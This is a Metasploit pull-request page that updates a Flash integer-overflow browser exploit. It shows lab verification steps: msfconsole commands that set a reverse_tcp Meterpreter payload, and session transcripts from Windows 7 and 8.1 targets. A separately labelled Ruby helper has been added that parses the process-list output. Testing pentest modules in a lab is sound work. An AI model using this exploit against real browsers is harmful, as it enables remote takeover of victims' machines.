adobe_flash_casi32_int_overflow: Execution from the flash renderer / Windows 8.1 #5517

Merged
merged 4 commits into from Jun 10, 2015

Conversation

jvazquez-r7 (Contributor)

This PR modifies modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb to use the flash exploitation code, allowing native payload execution from the flash renderer process. So no more PowerShell: we execute meterpreter directly and we remain in the same flash renderer process.

It also adds support for:

  • Firefox (32-bit) / Adobe Flash plug-in on Windows 7 SP1.
  • Firefox (32-bit) / Adobe Flash plug-in on Windows 8.1.

Verification

  • Install a Windows 7 target: Windows 7 SP1 32-bit / IE 11 / Firefox 38.0.5 / Adobe Flash 15.0.0.152 (ActiveX and plug-in)
  • Install a Windows 8.1 target: Windows 8.1 (32-bit or 64-bit), Firefox 38.0.5 (32-bit) and Flash 15.0.0.152 (plug-in)
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_casi32_int_overflow
  • Run the module with the windows/meterpreter/reverse_tcp payload:

```
msf > use exploit/windows/browser/adobe_flash_casi32_int_overflow
msf exploit(adobe_flash_casi32_int_overflow) > set SRVHOST 172.16.158.1
SRVHOST => 172.16.158.1
msf exploit(adobe_flash_casi32_int_overflow) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_casi32_int_overflow) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_casi32_int_overflow) > exploit
```
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 15.0.0.152 (ActiveX), verify that you get a session and that it lives inside the IE renderer process:

```
msf exploit(adobe_flash_casi32_int_overflow) >
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Gathering target information.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML response.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML...
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/gFIr.swf
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.131:49585) at 2015-06-09 11:39:01 -0500

msf exploit(adobe_flash_casi32_int_overflow) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getpid
Current pid: 3148
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > ps -S 3148

Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 3148  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe

meterpreter > exit
```
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 15.0.0.152 (plug-in), verify that you get a session and that it lives inside the Flash renderer process:

```
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Gathering target information.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML response.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML...
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/moAt.swf
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.131:49600) at 2015-06-09 11:39:49 -0500

msf exploit(adobe_flash_casi32_int_overflow) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 1680
meterpreter > ps -S 1680

Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 1680  FlashPlayerPlugin_15_0_0_152.exe    x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe

meterpreter > exit
[*] Shutting down Meterpreter...
```
  • Visit the page from Windows 8.1 / Firefox 38.0.5 / Adobe Flash 15.0.0.152 (plug-in), verify that you get a session and that it lives inside the Flash renderer process:

```
msf exploit(adobe_flash_casi32_int_overflow) >
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Gathering target information.
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Sending HTML response.
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Sending HTML...
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/ylpZCt.swf
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.132
[*] Meterpreter session 5 opened (172.16.158.1:4444 -> 172.16.158.132:50906) at 2015-06-09 11:48:27 -0500

msf exploit(adobe_flash_casi32_int_overflow) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2500
meterpreter > ps -S 2500

Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 2500  FlashPlayerPlugin_15_0_0_152.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe

meterpreter > exit
[*] Shutting down Meterpreter...
```
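The verification steps above check by hand that the Meterpreter pid maps to the renderer the module is expected to land in (iexplore.exe for the ActiveX control, FlashPlayerPlugin_<version>.exe for the NPAPI plug-in). The following Ruby helper does that check mechanically; it is an added example, not code from this PR or from the Metasploit module. The sample `ps -S` tables are copied from the transcripts above, and the target names `:ie_activex` / `:firefox_plugin` are this helper's own convention, not module target names.

```ruby
# Added verification helper (not part of the PR or the Metasploit module):
# parses Meterpreter `ps -S <pid>` output and checks that the session lives
# in the renderer process expected for a given target.

ProcEntry = Struct.new(:pid, :name, :arch, :session, :user, :path)

# Expected host image per target, taken from the PR's transcripts. The
# target symbols are this helper's own, not the module's target names.
#   IE + Flash ActiveX control  -> the payload runs inside iexplore.exe
#   Firefox + Flash NPAPI plug-in -> inside FlashPlayerPlugin_<maj>_<min>_<build>_<rev>.exe
EXPECTED_RENDERER = {
  ie_activex:     /\Aiexplore\.exe\z/i,
  firefox_plugin: /\AFlashPlayerPlugin_(\d+)_(\d+)_(\d+)_(\d+)\.exe\z/i
}.freeze

PS_COLUMNS = %w[PID Name Arch Session User Path].freeze

# Meterpreter's process list is a fixed-width table whose User and Path
# columns may contain spaces ("Juan Vazquez", "Program Files"), so rows are
# sliced at the header's column offsets instead of being split on whitespace.
def parse_ps_table(text)
  lines = text.lines.map(&:rstrip)
  hdr_idx = lines.index { |l| l.match?(/\A\s*PID\s+Name\s+Arch\s+Session\s+User\s+Path\z/) }
  raise ArgumentError, 'no Meterpreter process-list header found' unless hdr_idx

  offsets = PS_COLUMNS.map { |c| lines[hdr_idx].index(c) }
  # hdr_idx + 1 is the "---" underline; data rows (starting with a pid) follow.
  lines.drop(hdr_idx + 2).reject(&:empty?).take_while { |r| r.match?(/\A\s*\d+\s/) }.map do |row|
    fields = offsets.each_with_index.map do |start, i|
      stop = offsets[i + 1] || row.length
      row[start...stop].to_s.strip
    end
    ProcEntry.new(fields[0].to_i, fields[1], fields[2], fields[3].to_i, fields[4], fields[5])
  end
end

# :ok is true only when the Meterpreter pid maps to the expected renderer
# image. For the plug-in, the Flash version is recovered from the executable
# name so it can be compared against the build the target was prepared with.
def verify_renderer(target, pid, ps_text)
  entry = parse_ps_table(ps_text).find { |p| p.pid == pid }
  return { ok: false, reason: "pid #{pid} not in process list" } unless entry

  m = EXPECTED_RENDERER.fetch(target).match(entry.name)
  unless m
    return { ok: false, process: entry.name,
             reason: "pid #{pid} is #{entry.name}, not the #{target} renderer" }
  end

  {
    ok: true,
    process: entry.name,
    arch: entry.arch,
    user: entry.user,
    flash_version: (m.captures.join('.') unless m.captures.empty?)
  }
end

# Sample tables copied from the PR's Windows 7 transcripts (IE 11 / ActiveX
# and Firefox / plug-in).
SAMPLE_PS_IE = <<~'PS'
  Process list
  ============

   PID   Name                                Arch  Session  User                          Path
   ---   ----                                ----  -------  ----                          ----
   3148  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe
PS

SAMPLE_PS_FIREFOX = <<~'PS'
  Process list
  ============

   PID   Name                                Arch  Session  User                          Path
   ---   ----                                ----  -------  ----                          ----
   1680  FlashPlayerPlugin_15_0_0_152.exe    x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe
PS

if $PROGRAM_NAME == __FILE__
  p verify_renderer(:ie_activex, 3148, SAMPLE_PS_IE)
  p verify_renderer(:firefox_plugin, 1680, SAMPLE_PS_FIREFOX)
  p verify_renderer(:firefox_plugin, 3148, SAMPLE_PS_IE)   # wrong renderer -> ok: false
end
```

The slice-by-header-offset parser is what makes this robust: a whitespace split would break on the "Juan Vazquez" user name and on "Program Files" in the IE path, and a check that only looked at the image name would not notice if the session had landed in a spawned child instead of the pid returned by `getpid`.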

@wchen-r7 (Contributor)

Tested on all.

@wchen-r7 wchen-r7 merged commit 4f1ee3f into rapid7:master Jun 10, 2015